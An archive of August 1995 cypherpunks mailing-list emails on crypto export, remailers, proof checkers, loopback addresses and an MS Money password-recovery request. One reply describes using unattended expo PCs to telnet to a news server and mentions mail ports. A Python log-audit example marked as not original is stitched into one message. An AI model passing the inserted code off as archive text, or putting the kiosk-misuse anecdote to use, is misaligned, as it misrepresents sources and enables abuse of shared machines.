they can't export.) swIPe won't do what you want out of the box
anyway, though.

> Also, what are the legal ramifications? Can I get an export license 
> for this?

Doubtful, but I believe swIPe is on overseas sites already.

> Is there an encryption method that doesn't require an
> export license?

None you care to use.

> Is swIPe legal? That is, are any patents being misappropriated by the
> current version?

No.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Mon, 7 Aug 95 08:07:11 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: RSA/Perl Shirts
Message-ID: <Pine.SUN.3.91.950807110621.14512A-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Has Joel Furr shipped his shirts yet?

I see some people on the list have gotten shirts and I was wondering as 
I still have not gotten mine.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 7 Aug 95 08:23:12 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <ac4b096d0102100487ad@[205.199.118.202]>
Message-ID: <9508071521.AA10100@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



All this quibbling about the "validity" of proof checkers is philosophically
inept. It is a basic property of logic that it proceeds from axioms to
conclusions. No proposition can be understood except by reference to some
other proposition.

It is not possible to objectively observe anything, all observation is made
through a mechanism which is imperfectly analysed and thus the observation
is subjective to the extent that the interpretation is unknown.

We may obtain an objective statement from a subjective observation by reference
to the source of subjectivity. If however the subjective assumptions are shared 
by all participants within the system of being any statement which follows from 
only those assumptions may be regarded as objective. Objectivity is thus not
an atomic fact but a relation, a fact cannot have the property of objectivity 
except with respect to a system of being.

[Thus I may assert 1+1=2 as an objective fact since the assumptions upon which
it is based are commonly shared. If however someone wished to question this
statement (e.g. phenomenological bracketing) then in the context of that 
discussion I would accept it as being subjective.]


The question of proving the proof checker is thus an extension of a more 
fundamental problem, providing proof of proof. Since a proof is a fact and facts 
are subjective except with respect to a system of being the demand for proof of 
consistency of proof is an extension of the requirements for proof as normally 
understood. 

The requirement for "proving" a program is thus significantly less onerous than 
asserted. It is not necessary to provide a transcendental proof, merely to 
establish consistency with respect to a commonly accepted set of axioms.


	Phill Hallam-Baker



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 7 Aug 95 08:36:32 PDT
To: cypherpunks@toad.com
Subject: Re: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
In-Reply-To: <199508050036.RAA18410@comsec.com>
Message-ID: <9508071534.AA19224@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Thu, 3 Aug 1995 11:06:19 -0400
>From: ACLUNATL@aol.com

>					The amendment would have the
>effect of actually usurping control from parents in favor of a government
>approval panel.

Anecdote:

	I was in Cambridge MA this past weekend visiting old friends, some
at church.  I sat across from one such at lunch -- a young guy up from
Texas going on about how good it is that people are fighting cyberporn.

	I brought up parental control in attempted rebuttal and he switched
immediately to the idea that `parents usually *are* the child abusers and
we need to protect children from them -- not give parents control over what
gets communicated electronically'.

	I was surprised at the speed with which he switched to that line of
thought.  It's clear that this chess game opening has been played by or
around him before.

	[Come to think of it now, it's completely consistent with the
anti-abortion stand: that children (starting at fetus) are the property of
Society and parents are required to serve Society as soon as a child is
conceived (or perhaps as soon as they start having sex).  If it's child
abusers you're talking about, that line of reasoning can carry emotional
appeal.  However, I lived in Utah at a time when it was illegal for parents
to instruct their children about birth control (I was told (I didn't read
the law personally.)).]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 7 Aug 95 09:04:17 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071521.AA10100@zorch.w3.org>
Message-ID: <9508071603.AA19197@all.net>
MIME-Version: 1.0
Content-Type: text


> All this quibbling about the "validity" of proof checkers is philosophically
> inept. It is a basic property of logic that it proceeds from axioms to
> conclusions. No proposition can be understood except by reference to some
> other proposition.

Except that it all starts with language and develops through set theory.

> It is not possible to objectively observe anything, all observation is made
> through a mechanism which is imperfectly analysed and thus the observation
> is subjective to the extent that the interpretation is unknown.

And yet it is all based on observations at the initial set theoretic level.

> We may obtain an objective statement from a subjective observation by reference
> to the source of subjectivity. If however the subjective assumptions are shared 
> by all participants within the system of being any statement which follows from 
> only those assumptions may be regarded as objective. Objectivity is thus not
> an atomic fact but a relation, a fact cannot have the property of objectivity 
> except with respect to a system of being.

And indeed, we are people which gives us some common context.

> [Thus I may assert 1+1=2 as an objective fact since the assumptions upon which
> it is based are commonly shared. If however someone wished to question this
> statement (e.g. phenomenological bracketing) then in the context of that 
> discussion I would accept it as being subjective.]

I was taught 1+1=1 in boolean algebra.

> The question of proving the proof checker is thus an extension of a more 
> fundamental problem, providing proof of proof. Since a proof is a fact and facts 
> are subjective except with respect to a system of being the demand for proof of 
> consistency of proof is an extension of the requirements for proof as normally 
> understood. 

But in computers, we are living in a mathematically defined system
(except for physical issues which have been suppressed to a very large
extent by the design of statistically low error-rate systems) which
follows very precisely the logic of its design.  Thus proofs work since
we are working in this well formed domain.

> The requirement for "proving" a program is thus significantly less onerous than 
> asserted. It is not necessary to provide a transcendental proof, merely to 
> establish consistency with respect to a commonly accepted set of axioms.

More specifically, within the logic dictated by the hardware designed to assure
that the system remains within the mathematical structure defined by its design.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Quazi F. Haque" <qfh1@crux3.cit.cornell.edu>
Date: Mon, 7 Aug 95 09:49:48 PDT
To: John Young <jya@pipeline.com>
Subject: Re: JIL_ted
In-Reply-To: <199508051212.IAA26627@pipe3.nyc.pipeline.com>
Message-ID: <Pine.ULT.3.91.950807124840.5606B-100000@crux3.cit.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain




  Quazi F Haque  | Those that can give up essential liberty to obtain a little
qfh1@cornell.edu | temporary safety deserve neither liberty nor safety. - BF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tfs@adc.com (Tony F Sgarlatti)
Date: Mon, 7 Aug 95 10:53:00 PDT
To: kelly@netcom.com
Subject: Re: Over 350 'Munitions T-shirts' Shipped
Message-ID: <9508071751.AA09815@ohtar>
MIME-Version: 1.0
Content-Type: text/plain


> Where are mine...I got the money to you via
> Mario wojo???? at SUN...
> I ordered 8 of the shirts
> BTW
> I am the publisher of PGP 1.0 the only person
> who will be indicted with Phil or alone for PGP
> what about MY defense fund????
> 
> Check Gov Access for my story

Could you be a little more specific regarding your URL?  Thanks!

*******************************************************************************
* Just say know!                Tony Sgarlatti            thetruth@future.net *
******************************************************************************* 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 7 Aug 95 09:53:38 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <ac4b096d0102100487ad@[205.199.118.202]>
Message-ID: <199508071653.MAA03355@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Phill Hallam-Baker summarized it best. I advise anyone interested in this
issue to read up on pancritical rationalism (a favorite extropian topic of
debate). "The Retreat to Commitment" by Bartley (?, sorry, can't recall
at the moment, the book is not with me) is a good writeup of the subject.
At the lowest level, even the basic axioms can be criticized.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Schultz <jschultz@mail.coin.missouri.edu>
Date: Mon, 7 Aug 95 11:25:56 PDT
To: "Rev. Ben" <samman@CS.YALE.EDU>
Subject: Re: RSA/Perl Shirts
In-Reply-To: <Pine.SUN.3.91.950807110621.14512A-100000@frog.zoo2.cs.yale.edu>
Message-ID: <Pine.SOL.3.91.950807131928.168A-100000@coinc0>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Rev. Ben wrote:
> Has Joel Furr shipped his shirts yet?
> 
> I see some people on the list have gotten shirts and I was wondering as 
> I still have not gotten mine.

I was wondering the same thing myself.  I know my check was cashed over a 
month ago, but no shirt has arrived.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Mon, 7 Aug 95 11:22:58 PDT
To: cypherpunks@toad.com
Subject: addresses
Message-ID: <01HTSKP4C88Y8ZDVMP@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


thanks much to all who responded to my query on the 
problem i was having with the strange address.

i think i have more than enough information to resolve 
this problem.

amp
*********************************************
*          / Only God can see the whole     *
*  O[%\%\%{<>===========================-   *
*          \ Mandlebrot Set at Once!        *
* amp                                       *
* <0003701548@mcimail.com>                  *
* <alan.pugh@internetmci.com>               *
* PGP Key = 4A2683C1                        *
*********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 7 Aug 95 10:41:53 PDT
To: solman@MIT.EDU
Subject: Re: RSA has been proved correct
In-Reply-To: <9508050806.AA22214@ua.MIT.EDU>
Message-ID: <m0sfWAM-0009yuC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> Given the enormous difficulty of ensuring security in a world of
> ubiquitous distributed computing, I'm as big a fan as any of formal
> methods. But Tim's post hammers home the big fault of formal methods:
> the possibility that people will come to rely upon them. I have

"Logic is a system whereby one may go wrong with confidence." - Patterson

...
> 
> Cheers,
> 
> JWS
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 7 Aug 95 12:35:52 PDT
To: cypherpunks@toad.com
Subject: www remailer interface
Message-ID: <199508071935.OAA24824@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



c'punks,

Please check out the new www remailer interface at 

http://miso.wwa.com/~dochobbs/cpremailer.html

It is based on nate's code with one addition for security
and contains info from other places.

I would appreciate some visits and comments/criticisms
before I place it in the general population.  Again,
give it a thorough test because I want it to be good 
and secure for me and those using it.

It's in its final testing phase (mainly because I haven't
got the news instructions just the way I want them) and
will be set to go soon.  I am, of course, sending this 
message through the page.

Michael Hobbs
dochobbs@wwa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 7 Aug 95 12:05:21 PDT
To: rsaeuro@sourcery.demon.co.uk
Subject: Re: ANNOUNCE:- RSAEURO Version 1.00
In-Reply-To: <12@sourcery.demon.co.uk>
Message-ID: <199508071904.PAA21608@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just wanted to publicly thank Stephen Kapp for writing this.  It's
long past time RSAREF was re-created outside the USA.  Also, this
toolkit will be useful to those of us in the USA in about 5 years.

Thanks, Stephen!

You wrote:

| RSAEURO is a cryptographic toolkit providing various functions for the use
| of digital signatures, data encryption and supporting areas (PEM 
| encoding, random number generation etc).  To aid compatibility with 
| existing software, RSAEURO is call-compatible with RSADSI's "RSAREF(tm)" 
| toolkit. RSAEURO allows non-US residents to make use of much of the 
| cryptographic software previously only (legally) available in the US.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Mon, 7 Aug 95 13:10:18 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: "The Net"
In-Reply-To: <Pine.BSD/.3.91.950807151937.11218A-100000@escape.com>
Message-ID: <9508072009.AA17336@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian writes
>Well, the loopback is only a single IP address.  If they used that, every 
>net.entity would have the same IP.  Not too good. :-)

Nope.  *Any* IP address starting with 127 is a host loopback address
and shouldn't appear outside the host.  This from the "Assigned
Numbers" RFC (STD 2).

127.0.0.1 is only convention.  It's the "first" loopback address.
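
Added example (not part of the original message): a check that treats all of 127.0.0.0/8 as loopback, flags any such address seen on a non-loopback interface, and rejects dotted quads with an octet above 255, the other case raised in this thread. The log format, interface names and sample addresses are constructed for illustration.

```python
import ipaddress
import re

# The whole 127/8 block is loopback, not just 127.0.0.1.
LOOPBACK_NET = ipaddress.ip_network("127.0.0.0/8")

# Constructed sample records in a simplified "IN=<iface> SRC=<addr> DST=<addr>" form.
SAMPLE_LOG = """\
IN=lo SRC=127.0.0.1 DST=127.0.0.1
IN=eth0 SRC=192.0.2.44 DST=198.51.100.7
IN=eth0 SRC=127.42.9.3 DST=198.51.100.7
IN=eth0 SRC=192.0.2.44 DST=127.255.255.254
IN=eth0 SRC=10.300.2.1 DST=198.51.100.7
"""

FIELD = re.compile(r"(\w+)=(\S+)")


def classify(addr_text):
    """Return 'invalid', 'loopback' or 'other' for a dotted-quad string."""
    try:
        addr = ipaddress.IPv4Address(addr_text)
    except ipaddress.AddressValueError:
        # Wrong number of octets, non-digits, or an octet greater than 255.
        return "invalid"
    return "loopback" if addr in LOOPBACK_NET else "other"


def audit(log_text, loopback_iface="lo"):
    """Return (line number, field, address, reason) for each suspect address."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = dict(FIELD.findall(line))
        iface = fields.get("IN")
        for key in ("SRC", "DST"):
            text = fields.get(key, "")
            kind = classify(text)
            if kind == "invalid":
                findings.append((lineno, key, text, "not a valid IPv4 address"))
            elif kind == "loopback" and iface != loopback_iface:
                findings.append(
                    (lineno, key, text, "loopback address outside the host")
                )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print(finding)
```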




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 12:34:25 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "The Net"
In-Reply-To: <9o809c19w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950807151937.11218A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Dr. Dimitri Vulis wrote:

> I once was a consultant at a small financial services firm, and a (young,
> disturbed) user was going around playing stupid pranks on unattended PCs. I
> mandated the use of screenblankers that kicked in after 3 minutes of inactivity
> and required a password to get back. The user would then reboot the PCs; some
> password was needed to get onto the LAN, but he'd mess with the local
> config.sys's. He eventually got fired and I do something else.

Unfortunately, the lusers here are brain-dead and don't care about 
anything.  They don't even know the first things about DOS.  We do have a 
couple of geniuses who think they know Windoze (or want to learn it) who 
occasionally play with the icons and groups: one such genius once closed 
a group window, then claimed someone "erased it."  What a dork!  The 
worst is that I have to clean up after them no matter how stupid they are.


> I guess byte values>255 are the IP equivalent of 555. Better than 127.0.0.1 -
> someone might telnet to 127.0.0.1, then ask mgm/ua whose address this is. :)

Well, the loopback is only a single IP address.  If they used that, every 
net.entity would have the same IP.  Not too good. :-)

> My 6yr-old's IBM Aptiva comes with a sound board and the software that reads
> English text and pronounces it in much more lifelike manner than the gizmo in
> the movie. That gizmo sounded annoyingly computer-like, but had intonations
> obviously coming from a human actor.

Nope, sounded right like the Apple MacinTalk II Pro voices.  They've 
got some really cool voices, some even human sounding.  Check it out if 
you get a chance.  Real intonations: you can hear the voice flex, etc.  
There are some voices that follow songs or other tones.  (i.e. Big Ben, 
Bells, etc.)  They sound like they're singing.

> The notion is very realistic (but the flashy displays in the movie were not).
> At the recent PC Expo at the Javitz Center in NYC, there were tens of PCs
> running various Web browsers to try out. No one was watching over most of them.
> I entered the URL telnet://uunet.uu.net:119, and sure enough, got connected.
> It accepted 'IHAVE', but I was too lazy to type in an entire Usenet article.
> I (and the heroine) could have telnetted to someone's port 25 just as easily.

Yep.  Those be the same machines where I dropped my Cypherpunx PC EXPO 
V2.0 disks.  Just left a few dozen in front of each machine as I used 
them.  Sort of the sleight of hand that thieves use to lift stuff; only I 
didn't take, I put. >;-)


> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Say, what's on this BBS anyway... (send me email, enough noise on this list.)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 7 Aug 95 12:31:39 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
In-Reply-To: <9508071534.AA19224@tis.com>
Message-ID: <Pine.SUN.3.91.950807152525.16169H-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Aug 1995, Carl Ellison wrote:

> Anecdote:
> 
> 	I was in Cambridge MA this past weekend visiting old friends, some
> at church.  I sat across from one such at lunch -- a young guy up from
> Texas going on about how good it is that people are fighting cyberporn.
> 
> 	I brought up parental control in attempted rebuttal and he switched
> immediately to the idea that `parents usually *are* the child abusers and
> we need to protect children from them -- not give parents control over what
> gets communicated electronically'.
> 
> 	I was surprised at the speed with which he switched to that line of
> thought.  It's clear that this chess game opening has been played by or
> around him before.

I suppose it was pointless to point out (in this case, not in general 
public debate) that parents who are child abusers have no need to use the 
Internet to acquire victims?  Two totally, completely, absolutely 
different questions.

Or am I missing something?
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:19:05 PDT
To: Matt Miszewski <crypto@midex.com>
Subject: Re: MS Money password problem
In-Reply-To: <Pine.3.89.9508062007.A19303-0100000@shaq.midex.com>
Message-ID: <Pine.BSD/.3.91.950807160839.11218R-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Aug 1995, Matt Miszewski wrote:

> We recently lost (ok fired) our office manager, but not before she put 
> nifty passwords on all the MS Money data we had and now she has, of 
> course, gone on a three week vacation.  I have all the relevant WP 
> password retrieving mechanisms but not one for MS Money.
> 
> Anyone with pointers or programs, your help would be greatly appreciated.

Welp, good luck to you.  Of course, this should be a great huge reminder 
of why BACKUPS are important.  If you have a backup of the data >BEFORE< 
she locked it, you only lost anything entered from between the date of 
the backup and "today."

Tim of course has a point.  Strong crypto isn't breakable.  Don't know 
what MS Money uses... :-(

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:21:47 PDT
To: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Subject: Re: Noise: PBS under the Republicans (fwd)
In-Reply-To: <199508040003.SAA12916@bvsd.k12.co.us>
Message-ID: <Pine.BSD/.3.91.950807161207.11218U-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Ian S. Nelson wrote:

> > // Ray, you may want to forward this to the list.
   ^^^^ THIS IS WHY :-)  The original poster of this asked me to post it 
to this list for him.  Why? Cause I run a filtered cypherpunks service to 
which he subscribes - he wanted me to forward this to the real list, so I 
did.  Since its contents are not-quite-crypto related, you see "Noise:" 
in the subject.

> 
> Why am I seeing this with the cp list?
> 

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Mon, 7 Aug 95 13:32:41 PDT
To: Don Henson <dhenson@itsnet.com>
Subject: Re: Over 350 'Munitions T-shirts' Shipped
In-Reply-To: <199508071416.IAA14134@scratchy.itsnet.com>
Message-ID: <Pine.BSD/.3.91.950807161751.11218V-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know if the ones printed by Joe Furr have/will be mailed soon?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dochobbs@wwa.com (Michael D. Hobbs)
Date: Mon, 7 Aug 95 14:19:36 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: www remailer interface
Message-ID: <m0sfZa3-000FTwC@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


It has been stated, 

:I'm a bit uncomfortable about the hardwiring of a particular remailer into
:the chain, according to the Web page
:
:	"Select your remailers [...] Your mail will be automatically sent
:	 to the remailer hfinney@shell.portal.com and at least one other
:	 remailer that you choose."
:
:(Nothing personal, Hal :)
:
:Why was this done ?
:
:-Futplex

The code was written to be used with a local remailer that
then sends it along the others that the sender chooses. I
modified it so that I don't need to establish my own remailer
by sending it to hfinney@shell.portal.com.

I think this might provide better security for the sender due
to the fact that you are forced to chain your letter thus
providing more security.  The argument can be made that if the
initial hardwired remailer is compromised that this removes 
all security.  I chose hfinney because 

1. the turnaround time is good.  I wanted the first to be fast
because it is basically 'insurance' for the sender.

2. it was a remailer that I am familiar with and has been around
(in remailer server time) awhile.

3. it was the one that I personally felt most comfortable with
using as the hardwired mailer.

Granted these might not be the best reasons, but this is the
kind of response I was looking for.  I can solve the problem
by either

1. removing the hardwired

2. removing the hardwired and forcing you to chain

3. keep the hardwired in and use some 'established' remailer or
one the group can come to a consensus on.

Responses appreciated.  I will gladly distribute the code if
desired.  Like the page states, it was originally written
by Nate Sammons, but I can change it as needed.


_____________________________________________________________
dochobbs@wwa.com	M.D. Hobbs	mhobbs@rad.rpslmc.edu
http://miso.wwa.com/~dochobbs		finger for my pgp key
I am human and nothing human do I count alien.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 7 Aug 95 13:31:16 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: www remailer interface
In-Reply-To: <199508071935.OAA24824@ valhalla.phoenix.net>
Message-ID: <9508072031.AA08118@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous/Michael Hobbs writes:
> Please check out the new www remailer interface at 
> 
> http://miso.wwa.com/~dochobbs/cpremailer.html
[...]
> I would appreciate some visits and comments/criticisms
> before I place it in the general population.  

I'm a bit uncomfortable about the hardwiring of a particular remailer into
the chain, according to the Web page:

	"Select your remailers [...] Your mail will be automatically sent
	 to the remailer hfinney@shell.portal.com and at least one other
	 remailer that you choose."

(Nothing personal, Hal :)

Why was this done ?

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 7 Aug 95 14:08:14 PDT
To: altitude@cic.net (Alex Tang)
Subject: Re: SSLeay - Whats the story...
In-Reply-To: <199508040455.AAA18486@petrified.cic.net>
Message-ID: <199508072107.RAA22991@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| > As SSL has some intrinsic points of weakness, I don't see the point
| > of sticking to it to secure the TCP layer.
| 
| just wondering but...What are the intrinsic points of weakness?  

	As Bruce Schneier reminded people in his keynote at Defcon,
it's easier to steal the keys than to break the cryptosystem.  Web
servers tend to be far too big and bulky to be trusted with
cryptographic keys.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 7 Aug 95 14:24:45 PDT
To: cypherpunks@toad.com
Subject: Re: Quibbling about definitions of "proof"
In-Reply-To: <9508071603.AA19197@all.net>
Message-ID: <9508072123.AA17396@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> All this quibbling about the "validity" of proof checkers is philosophically
>> inept. It is a basic property of logic that it proceeds from axioms to
>> conclusions. No proposition can be understood except by reference to some
>> other proposition.

>Except that it all starts with language and develops through set theory.

That is not necessarily the case. It all starts with communication of which 
language is a form, logic is a more perfect form of communication because its 
validity is most widely shared. 

It is perfectly consistent to deny the supremacy of logic. Wittgenstein was 
wrong to assert that it is impossible to step outside the logical framework. The 
mind may be characterised by logical inferences but that does not mean that it 
is bounded by logical inferences. The observer might take a hallucinatory drug 
for example and thereby participate in an extra-logical ontology.

>And yet it is all based on observations at the initial set theoretic level.

Only if you accept that the logical positivists were right and that there is no 
thought that cannot be characterised in that manner. The problem with this 
approach is that it prevents consideration of the real issue which philosophy 
should consider, the questions of being, time and spirit. We might consider that 
the logical positivists found an answer to the wrong question while the 
continental school found an unsatisfactory answer to the right one.

>And indeed, we are people which gives us some common context.

Exactly, we can communicate because we participate within the same system of 
being and that provides sufficient common reference points for us to convince 
ourselves that we are communicating the same ideas. We cannot prove that we are 
in fact achieving this goal for we cannot objectively determine that we both 
observe the same things.

>> The question of proving the proof checker is thus an extension of a more 
>> fundamental problem, providing proof of proof. Since a proof is a fact and 
>> facts are subjective except with respect to a system of being the demand for 
>> proof of consistency of proof is an extension of the requirements for proof 
>> as normally understood. 

>But in computers, we are living in a mathematically defined system
>(except for physical issues which have been suppressed to a very large
>extent by the design of statistically low error-rate systems) which
>follows very precisely the logic of its design.  Thus proofs work since
>we are working in this well formed domain.

But that mathematically defined system is still subject to the constraint that 
we cannot analyse the thing in itself. Instead we must step outside the system 
to analyse it. We do not in fact define LISP in LISP what we actually do is to 
define LISP in a language that looks like LISP and demonstrate that the two are 
compatible. 

It is important to distinguish a demonstration of meta-consistency from a proof 
within the logic of that logic. We might assert correctly that a program has 
been proven correct using a proof checker. We do not need to explain that the 
proof is of correctness with respect to a set of axioms for that is the nature 
of proof and is thus no more necessary when considering proofs of computer 
programs than of any other type of proofs. The meta-form of this proof is "A 
Therefore B where B is independent of A". We cannot however assert that we have 
used the program checker to prove itself. That would have a meta-form "A 
Therefore A". This form does not contain any information.

The only meta form of A concerning A that carries information is "A Therefore 
(not A)". This implies that A is false. Thus although it is not possible to 
prove A true it is possible to prove it false.


		Phill Hallam-Baker
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 7 Aug 95 17:19:57 PDT
To: cypherpunks@toad.com
Subject: Where to find Internet growth stats?
